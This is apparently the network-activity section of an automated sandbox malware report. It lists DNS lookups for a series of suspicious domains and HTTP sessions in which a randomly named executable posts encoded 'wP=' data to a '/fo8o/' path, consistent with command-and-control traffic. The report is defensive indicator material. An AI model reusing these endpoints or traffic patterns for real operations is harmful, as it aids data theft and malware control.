Aug 12, 2024 13:04:15.323456049 CEST	192.168.2.6	1.1.1.1	0x3abc	Standard query (0)	www.joyesi.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 12, 2024 13:00:40.132046938 CEST	1.1.1.1	192.168.2.6	0xad6	No error (0)	www.3xfootball.com		154.215.72.110	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:00:40.134618044 CEST	1.1.1.1	192.168.2.6	0xad6	No error (0)	www.3xfootball.com		154.215.72.110	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:00:56.406871080 CEST	1.1.1.1	192.168.2.6	0xd98b	No error (0)	www.kasegitai.tokyo		52.25.92.0	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:01:10.011419058 CEST	1.1.1.1	192.168.2.6	0x14af	No error (0)	www.goldenjade-travel.com		116.50.37.244	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:01:23.622721910 CEST	1.1.1.1	192.168.2.6	0xac9	Name error (3)	www.antonio-vivaldi.mobi	none	none	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:01:32.178788900 CEST	1.1.1.1	192.168.2.6	0x8d36	No error (0)	www.magmadokum.com	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 12, 2024 13:01:32.178788900 CEST	1.1.1.1	192.168.2.6	0x8d36	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 12, 2024 13:01:32.178788900 CEST	1.1.1.1	192.168.2.6	0x8d36	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:02:45.979935884 CEST	1.1.1.1	192.168.2.6	0xc2e0	No error (0)	www.rssnewscast.com		91.195.240.94	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:02:59.698348045 CEST	1.1.1.1	192.168.2.6	0xf15b	No error (0)	www.liangyuen528.com		15.197.172.60	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:03:13.117331028 CEST	1.1.1.1	192.168.2.6	0x53d8	No error (0)	www.techchains.info		66.29.149.46	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:03:26.455055952 CEST	1.1.1.1	192.168.2.6	0x9f49	No error (0)	www.elettrosistemista.zip	elettrosistemista.zip		CNAME (Canonical name)	IN (0x0001)	false
Aug 12, 2024 13:03:26.455055952 CEST	1.1.1.1	192.168.2.6	0x9f49	No error (0)	elettrosistemista.zip		195.110.124.133	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:03:40.374319077 CEST	1.1.1.1	192.168.2.6	0x94a1	No error (0)	www.donnavariedades.com		15.197.240.20	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:03:53.843091965 CEST	1.1.1.1	192.168.2.6	0x1e47	Name error (3)	www.660danm.top	none	none	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:04:01.979706049 CEST	1.1.1.1	192.168.2.6	0x6392	No error (0)	www.empowermedeco.com	empowermedeco.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 12, 2024 13:04:01.979706049 CEST	1.1.1.1	192.168.2.6	0x6392	No error (0)	empowermedeco.com		217.196.55.202	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:04:15.638817072 CEST	1.1.1.1	192.168.2.6	0x3abc	No error (0)	www.joyesi.xyz	77980.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 12, 2024 13:04:15.638817072 CEST	1.1.1.1	192.168.2.6	0x3abc	No error (0)	77980.bodis.com		199.59.243.226	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.3xfootball.com

www.kasegitai.tokyo

www.goldenjade-travel.com

www.magmadokum.com

www.rssnewscast.com

www.liangyuen528.com

www.techchains.info

www.elettrosistemista.zip

www.donnavariedades.com

www.empowermedeco.com

www.joyesi.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	54829	154.215.72.110	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:00:40.147324085 CEST	516	OUT	GET /fo8o/?wP=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8=&fPh4U=MJo4 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.3xfootball.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Aug 12, 2024 13:00:41.026031971 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 12 Aug 2024 11:00:40 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	54830	52.25.92.0	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:00:56.416621923 CEST	784	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 33 4f 6a 34 68 39 38 78 6f 45 48 42 33 45 74 49 7a 2f 63 65 67 36 4e 67 68 4d 58 57 72 64 61 4a 39 74 62 66 31 64 53 36 4e 39 38 Data Ascii: wP=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmff3Oj4h98xoEHB3EtIz/ceg6NghMXWrdaJ9tbf1dS6N98
Aug 12, 2024 13:00:57.014434099 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 12 Aug 2024 11:00:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 38 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 ff 73 13 c7 15 ff 59 fe 2b 96 9b 0e 27 25 a7 3b db 80 6b 6c 9d 18 08 38 d0 42 48 8b 33 6d c7 e3 61 56 ba d5 dd da 7b b7 e2 6e 25 59 31 cc f8 4e 84 f2 2d 85 36 2d 9d 90 74 12 1a 9a b4 74 06 3a 0d ed b4 c1 0d ff 4b 17 19 f8 89 7f a1 6f ef 24 eb 8b 4d 48 a6 f9 c1 a7 db dd b7 9f f7 de e7 bd dd 7b cf 13 a5 3d 0e af 8a 76 9d 20 4f f8 ac 3c 51 52 3f 88 e1 c0 b5 b5 95 ba a6 26 08 76 ca 13 b9 92 4f 04 46 55 0f 87 11 11 b6 f6 ce e2 42 71 56 db 9e 0f b0 4f 6c ad 49 49 ab ce 43 a1 a1 2a 0f 04 09 40 ae 45 1d e1 d9 0e 69 d2 2a 29 a6 03 03 d1 80 0a 8a 59 31 aa 62 46 ec 29 03 f9 78 8d fa 0d 7f 30 d1 88 48 98 8e 70 05 26 02 9e 2a 12 54 30 52 de 3f b9 0f 2d f0 b0 42 1d 87 04 25 2b 9b 84 55 46 83 55 14 12 66 6b 91 68 33 12 79 84 80 1d ca 33 5b 13 64 4d 58 d5 28 d2 90 17 92 9a ad 59 a9 88 a9 66 d4 d6 3d c5 e2 b0 17 21 af 70 11 0d f9 10 70 1a 38 64 4d 43 56 b9 58 ec 6d 58 a2 35 e4 0a 82 4e 1c 43 07 97 d5 5c 0a 39 ae 0f 16 72 a6 1b 62 87 02 10 5a 87 51 ae 46 99 20 e1 1c [TRUNCATED] Data Ascii: 831XsY+'%;kl8BH3maV{n%Y1N-6-tt:Ko$MH{=v O<QR?&vOFUBqVOlIIC@Ei)Y1bF)x0Hp&T0R?-B%+UFUfkh3y3[dMX(Yf=!pp8dMCVXmX5NC\9rbZQF x@aIH)Bor"v)`(".Z#\|p`-/->7HK" M0v.\&Qv1F\|X\|TX\6&r+ Pd`p>${t}~Q;"lDahZfVf!}a5CPwIHqxH+F_([AjCfy1dxx0q(EX,%+;&i.UFUWW+&m>l(KH 2V;M<B]\|RCYUoi>C:4W4hy%+3^f(kVkJ:%]^i'(t@<853;;;GMuBjpUww7y`02!@>vn(R"J41Nz)hOoWT>~S$+RlIogQ)[qLR\ md@nsEv\|)O/^=(7R%,s\|!; [TRUNCATED]
Aug 12, 2024 13:00:57.014494896 CEST	1078	IN	Data Raw: 75 0b b6 3d d8 35 d6 c0 4c 83 14 1d 0e 11 0c d2 4c f5 b9 83 19 33 eb 5e 7d 67 08 d3 eb 3d e0 35 ce 18 6f 81 67 f1 07 32 06 fb ae c8 f8 1a 3c bb 77 af 6c 7d f4 50 76 1e c1 73 eb d6 df 54 1c 64 f2 9b 67 77 ae cb f8 33 19 7f 2e e3 1b 32 fe 54 c6 bf Data Ascii: u=5LL3^}g=5og2<wl}PvsTdgw3.2TEeu__0(:V!qFT8&][' gnl0q!^]gVY9,o]y[O[E2$.2RP!z2y G2C2RKR;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	54832	52.25.92.0	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:00:58.955890894 CEST	808	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4b 5a 72 6c 52 67 5a 6e 67 57 64 73 44 35 32 6e 7a 57 4c 39 67 41 53 68 42 78 56 6e 79 51 45 74 35 72 53 55 34 69 6d 36 6c 68 38 71 66 79 69 6e 77 68 47 74 4a 4f 31 47 62 49 4d 4c 68 67 6f 42 69 70 58 65 67 55 46 2b 53 68 63 32 75 4f 6d 57 45 70 6a 35 6f 58 71 59 57 53 79 67 41 74 4d 50 2b 68 7a 47 74 66 43 58 30 50 61 42 45 41 32 67 4a 48 61 44 4f 48 6d 52 31 50 77 32 41 35 34 68 4a 59 2f 45 42 46 33 55 41 2f 2f 4d 77 61 50 67 6a 55 6c 57 4c 64 77 4c 39 56 62 4e 69 52 31 31 35 59 66 6a 57 6e 42 41 63 64 55 44 72 35 61 41 7a 63 56 2f 4b 33 69 4f 77 3d 3d Data Ascii: wP=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/KZrlRgZngWdsD52nzWL9gAShBxVnyQEt5rSU4im6lh8qfyinwhGtJO1GbIMLhgoBipXegUF+Shc2uOmWEpj5oXqYWSygAtMP+hzGtfCX0PaBEA2gJHaDOHmR1Pw2A54hJY/EBF3UA//MwaPgjUlWLdwL9VbNiR115YfjWnBAcdUDr5aAzcV/K3iOw==
Aug 12, 2024 13:00:59.547998905 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 12 Aug 2024 11:00:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 38 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 ff 73 13 c7 15 ff 59 fe 2b 96 9b 0e 27 25 a7 3b db 80 6b 6c 9d 18 08 38 d0 42 48 8b 33 6d c7 e3 61 56 ba d5 dd da 7b b7 e2 6e 25 59 31 cc f8 4e 84 f2 2d 85 36 2d 9d 90 74 12 1a 9a b4 74 06 3a 0d ed b4 c1 0d ff 4b 17 19 f8 89 7f a1 6f ef 24 eb 8b 4d 48 a6 f9 c1 a7 db dd b7 9f f7 de e7 bd dd 7b cf 13 a5 3d 0e af 8a 76 9d 20 4f f8 ac 3c 51 52 3f 88 e1 c0 b5 b5 95 ba a6 26 08 76 ca 13 b9 92 4f 04 46 55 0f 87 11 11 b6 f6 ce e2 42 71 56 db 9e 0f b0 4f 6c ad 49 49 ab ce 43 a1 a1 2a 0f 04 09 40 ae 45 1d e1 d9 0e 69 d2 2a 29 a6 03 03 d1 80 0a 8a 59 31 aa 62 46 ec 29 03 f9 78 8d fa 0d 7f 30 d1 88 48 98 8e 70 05 26 02 9e 2a 12 54 30 52 de 3f b9 0f 2d f0 b0 42 1d 87 04 25 2b 9b 84 55 46 83 55 14 12 66 6b 91 68 33 12 79 84 80 1d ca 33 5b 13 64 4d 58 d5 28 d2 90 17 92 9a ad 59 a9 88 a9 66 d4 d6 3d c5 e2 b0 17 21 af 70 11 0d f9 10 70 1a 38 64 4d 43 56 b9 58 ec 6d 58 a2 35 e4 0a 82 4e 1c 43 07 97 d5 5c 0a 39 ae 0f 16 72 a6 1b 62 87 02 10 5a 87 51 ae 46 99 20 e1 1c [TRUNCATED] Data Ascii: 831XsY+'%;kl8BH3maV{n%Y1N-6-tt:Ko$MH{=v O<QR?&vOFUBqVOlIIC@Ei)Y1bF)x0Hp&T0R?-B%+UFUfkh3y3[dMX(Yf=!pp8dMCVXmX5NC\9rbZQF x@aIH)Bor"v)`(".Z#\|p`-/->7HK" M0v.\&Qv1F\|X\|TX\6&r+ Pd`p>${t}~Q;"lDahZfVf!}a5CPwIHqxH+F_([AjCfy1dxx0q(EX,%+;&i.UFUWW+&m>l(KH 2V;M<B]\|RCYUoi>C:4W4hy%+3^f(kVkJ:%]^i'(t@<853;;;GMuBjpUww7y`02!@>vn(R"J41Nz)hOoWT>~S$+RlIogQ)[qLR\ md@nsEv\|)O/^=(7R%,s\|!; [TRUNCATED]
Aug 12, 2024 13:00:59.548060894 CEST	1078	IN	Data Raw: 75 0b b6 3d d8 35 d6 c0 4c 83 14 1d 0e 11 0c d2 4c f5 b9 83 19 33 eb 5e 7d 67 08 d3 eb 3d e0 35 ce 18 6f 81 67 f1 07 32 06 fb ae c8 f8 1a 3c bb 77 af 6c 7d f4 50 76 1e c1 73 eb d6 df 54 1c 64 f2 9b 67 77 ae cb f8 33 19 7f 2e e3 1b 32 fe 54 c6 bf Data Ascii: u=5LL3^}g=5og2<wl}PvsTdgw3.2TEeu__0(:V!qFT8&][' gnl0q!^]gVY9,o]y[O[E2$.2RP!z2y G2C2RKR;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	54833	52.25.92.0	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:01:01.485968113 CEST	1821	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4a 35 72 6c 6a 6f 5a 6d 48 43 64 2b 54 35 32 6b 7a 57 62 39 67 42 4f 68 46 64 5a 6e 79 55 36 74 36 54 53 57 62 36 6d 72 77 56 38 35 2f 79 69 34 41 68 46 77 5a 4f 67 47 62 59 41 4c 67 51 6f 42 69 70 58 65 6c 51 46 39 48 64 63 37 4f 4f 6c 58 45 70 6b 39 6f 58 43 59 57 72 4b 67 41 35 63 4d 4b 74 7a 46 4e 50 43 55 47 6e 61 48 55 41 30 6a 4a 47 48 44 4f 4c 48 52 31 54 38 32 41 4e 65 68 4c 45 2f 41 56 6c 75 46 42 62 61 65 6d 4f 43 67 30 6b 56 61 66 56 31 48 2b 4a 73 4b 6a 74 4a 72 59 4d 53 6f 77 58 6e 57 61 59 70 41 4c 64 62 4e 47 4e 35 33 62 32 47 63 2f 57 71 46 6a 52 35 78 62 6d 48 78 65 69 51 6f 32 45 61 62 30 4a 6f 6c 4f 46 4d 75 6f 33 2f 39 63 64 79 6e 30 6e 68 4e 4c 56 46 70 4e 72 4d 73 30 30 44 4e 56 7a 57 6d 4b 6c 30 63 58 52 55 4f 77 45 39 73 51 2b 4b 64 73 75 43 68 6e 52 64 44 34 34 7a 64 49 53 30 33 77 48 4a 62 32 66 58 6a 77 32 71 35 35 5a 56 4e 64 61 32 59 51 56 [TRUNCATED] Data Ascii: wP=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/J5rljoZmHCd+T52kzWb9gBOhFdZnyU6t6TSWb6mrwV85/yi4AhFwZOgGbYALgQoBipXelQF9Hdc7OOlXEpk9oXCYWrKgA5cMKtzFNPCUGnaHUA0jJGHDOLHR1T82ANehLE/AVluFBbaemOCg0kVafV1H+JsKjtJrYMSowXnWaYpALdbNGN53b2Gc/WqFjR5xbmHxeiQo2Eab0JolOFMuo3/9cdyn0nhNLVFpNrMs00DNVzWmKl0cXRUOwE9sQ+KdsuChnRdD44zdIS03wHJb2fXjw2q55ZVNda2YQVKohE7DA48Al1Ls1G3ckJ6bmm5PbIwFfYhhJWuqRqOccvvso1C25ZE+zb/G6GyONDu40a9xyZFOk1i5kdy6YOxF737AFW5aKBjciPwPW0lfXjqT0Plq9R2RUBktgloVMj6UEVo/s4tz9E1w1tDuaqqjxTRDx1w9YPE2wyQLLjYj3kUUHdbEK9Ptlc9VSB899BW1UKsT/FUeX5X4Hmd7t0Fa3B/YwGWpZnWZy06W065uXfCfSbry0czK10hWa/o6xXsyzfprP80Lb80p05H2FJjnUqKgnXBhSL7HNhS+puhii+dRg/FEaSbYVEfnXeXqoBcZoSDOQSeB8H8W/8IJc2L9Jq4BX+v/ztC8TXNo4vpDNIlyWuSR/jAh7tEGH9lWybVmlBeMYUyRUEFF2BeH3xTaX0FToHkjxiNc5qeYFMxZiB0uRimlRoC1pjAwFzK1HLPvYcB+fcIHq7pJus/IF5FTHnh0/1YNBx5Tmxc9KEm3KwEOXF38bFvpfQ99mYj7Iv2xoKFdgn8Tafw6J0/+SUE2Cu5zYMn+MRNkWvvI/wAMSGlvEeuGhVBXfjl6/XENY5J9R3ySB1FZm3HoIxSmCcNBbCXxfTRQolJR9U5BtM8ic4+eMzC6ktGQm08oL8AzrPZkz7c+lX7TGvvMs3JAF9ov75UC6MHOhEve [TRUNCATED]
Aug 12, 2024 13:01:02.368303061 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 12 Aug 2024 11:01:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 38 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 ff 73 13 c7 15 ff 59 fe 2b 96 9b 0e 27 25 a7 3b db 80 6b 6c 9d 18 08 38 d0 42 48 8b 33 6d c7 e3 61 56 ba d5 dd da 7b b7 e2 6e 25 59 31 cc f8 4e 84 f2 2d 85 36 2d 9d 90 74 12 1a 9a b4 74 06 3a 0d ed b4 c1 0d ff 4b 17 19 f8 89 7f a1 6f ef 24 eb 8b 4d 48 a6 f9 c1 a7 db dd b7 9f f7 de e7 bd dd 7b cf 13 a5 3d 0e af 8a 76 9d 20 4f f8 ac 3c 51 52 3f 88 e1 c0 b5 b5 95 ba a6 26 08 76 ca 13 b9 92 4f 04 46 55 0f 87 11 11 b6 f6 ce e2 42 71 56 db 9e 0f b0 4f 6c ad 49 49 ab ce 43 a1 a1 2a 0f 04 09 40 ae 45 1d e1 d9 0e 69 d2 2a 29 a6 03 03 d1 80 0a 8a 59 31 aa 62 46 ec 29 03 f9 78 8d fa 0d 7f 30 d1 88 48 98 8e 70 05 26 02 9e 2a 12 54 30 52 de 3f b9 0f 2d f0 b0 42 1d 87 04 25 2b 9b 84 55 46 83 55 14 12 66 6b 91 68 33 12 79 84 80 1d ca 33 5b 13 64 4d 58 d5 28 d2 90 17 92 9a ad 59 a9 88 a9 66 d4 d6 3d c5 e2 b0 17 21 af 70 11 0d f9 10 70 1a 38 64 4d 43 56 b9 58 ec 6d 58 a2 35 e4 0a 82 4e 1c 43 07 97 d5 5c 0a 39 ae 0f 16 72 a6 1b 62 87 02 10 5a 87 51 ae 46 99 20 e1 1c [TRUNCATED] Data Ascii: 831XsY+'%;kl8BH3maV{n%Y1N-6-tt:Ko$MH{=v O<QR?&vOFUBqVOlIIC@Ei)Y1bF)x0Hp&T0R?-B%+UFUfkh3y3[dMX(Yf=!pp8dMCVXmX5NC\9rbZQF x@aIH)Bor"v)`(".Z#\|p`-/->7HK" M0v.\&Qv1F\|X\|TX\6&r+ Pd`p>${t}~Q;"lDahZfVf!}a5CPwIHqxH+F_([AjCfy1dxx0q(EX,%+;&i.UFUWW+&m>l(KH 2V;M<B]\|RCYUoi>C:4W4hy%+3^f(kVkJ:%]^i'(t@<853;;;GMuBjpUww7y`02!@>vn(R"J41Nz)hOoWT>~S$+RlIogQ)[qLR\ md@nsEv\|)O/^=(7R%,s\|!; [TRUNCATED]
Aug 12, 2024 13:01:02.368505955 CEST	1078	IN	Data Raw: 75 0b b6 3d d8 35 d6 c0 4c 83 14 1d 0e 11 0c d2 4c f5 b9 83 19 33 eb 5e 7d 67 08 d3 eb 3d e0 35 ce 18 6f 81 67 f1 07 32 06 fb ae c8 f8 1a 3c bb 77 af 6c 7d f4 50 76 1e c1 73 eb d6 df 54 1c 64 f2 9b 67 77 ae cb f8 33 19 7f 2e e3 1b 32 fe 54 c6 bf Data Ascii: u=5LL3^}g=5og2<wl}PvsTdgw3.2TEeu__0(:V!qFT8&][' gnl0q!^]gVY9,o]y[O[E2$.2RP!z2y G2C2RKR;
Aug 12, 2024 13:01:02.372740030 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 12 Aug 2024 11:01:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 38 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 ff 73 13 c7 15 ff 59 fe 2b 96 9b 0e 27 25 a7 3b db 80 6b 6c 9d 18 08 38 d0 42 48 8b 33 6d c7 e3 61 56 ba d5 dd da 7b b7 e2 6e 25 59 31 cc f8 4e 84 f2 2d 85 36 2d 9d 90 74 12 1a 9a b4 74 06 3a 0d ed b4 c1 0d ff 4b 17 19 f8 89 7f a1 6f ef 24 eb 8b 4d 48 a6 f9 c1 a7 db dd b7 9f f7 de e7 bd dd 7b cf 13 a5 3d 0e af 8a 76 9d 20 4f f8 ac 3c 51 52 3f 88 e1 c0 b5 b5 95 ba a6 26 08 76 ca 13 b9 92 4f 04 46 55 0f 87 11 11 b6 f6 ce e2 42 71 56 db 9e 0f b0 4f 6c ad 49 49 ab ce 43 a1 a1 2a 0f 04 09 40 ae 45 1d e1 d9 0e 69 d2 2a 29 a6 03 03 d1 80 0a 8a 59 31 aa 62 46 ec 29 03 f9 78 8d fa 0d 7f 30 d1 88 48 98 8e 70 05 26 02 9e 2a 12 54 30 52 de 3f b9 0f 2d f0 b0 42 1d 87 04 25 2b 9b 84 55 46 83 55 14 12 66 6b 91 68 33 12 79 84 80 1d ca 33 5b 13 64 4d 58 d5 28 d2 90 17 92 9a ad 59 a9 88 a9 66 d4 d6 3d c5 e2 b0 17 21 af 70 11 0d f9 10 70 1a 38 64 4d 43 56 b9 58 ec 6d 58 a2 35 e4 0a 82 4e 1c 43 07 97 d5 5c 0a 39 ae 0f 16 72 a6 1b 62 87 02 10 5a 87 51 ae 46 99 20 e1 1c [TRUNCATED] Data Ascii: 831XsY+'%;kl8BH3maV{n%Y1N-6-tt:Ko$MH{=v O<QR?&vOFUBqVOlIIC@Ei)Y1bF)x0Hp&T0R?-B%+UFUfkh3y3[dMX(Yf=!pp8dMCVXmX5NC\9rbZQF x@aIH)Bor"v)`(".Z#\|p`-/->7HK" M0v.\&Qv1F\|X\|TX\6&r+ Pd`p>${t}~Q;"lDahZfVf!}a5CPwIHqxH+F_([AjCfy1dxx0q(EX,%+;&i.UFUWW+&m>l(KH 2V;M<B]\|RCYUoi>C:4W4hy%+3^f(kVkJ:%]^i'(t@<853;;;GMuBjpUww7y`02!@>vn(R"J41Nz)hOoWT>~S$+RlIogQ)[qLR\ md@nsEv\|)O/^=(7R%,s\|!; [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	54834	52.25.92.0	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
